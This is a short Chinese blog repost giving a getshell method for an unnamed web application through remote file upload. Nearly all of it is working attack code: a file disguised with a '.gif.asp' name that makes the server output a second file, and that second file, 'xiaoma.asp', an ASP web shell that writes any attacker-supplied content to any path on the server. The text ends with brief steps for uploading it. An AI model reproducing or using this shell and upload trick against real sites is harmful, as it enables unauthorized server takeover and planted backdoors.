有人说通杀,有人说2.8以后……
远程上传时执行代码
导致get shell
1.把yc.gif.asp xiaoma.ASa放在同一目录下(本地的)
——————————————远程文件(yc.gif.asp)——————————————————
- <%
- Set fs = CreateObject("Scripting.FileSystemObject")
- Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0)
- Thetext=MyTextStream.ReadAll
- response.write thetext
- %>
——————————————小马(xiaoma.asp)——————————————
- <%on error resume next%>
- <%ofso="scripting.filesystemobject"%>
- <%set fso=server.createobject(ofso)%>
- <%path=request("path")%>
- <%if path<>"" then%>
- <%data=request("dama")%>
- <%set dama=fso.createtextfile(path,true)%>
- <%dama.write data%>
- <%if err=0 then%>
- <%="success"%>
- <%else%>
- <%="false"%>
- <%end if%>
- <%err.clear%>
- <%end if%>
- <%dama.close%>
- <%set dama=nothing%>
- <%set fos=nothing%>
- <%="<form action=" method=post>"%>
- <%="<input type=text name=path>"%>
- <%="<br>"%>
- <%=server.mappath(request.servervariables("script_name"))%>
- <%="<br>"%>
- <%=""%>
- <%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
- <%="<br>"%>
- <%="<input type=submit value=save>"%>
- <%="</form>"%>
2.远程上传yc.gif.asp
会自动执行脚本,上次小马。
转载于:https://blog.51cto.com/obnus/468833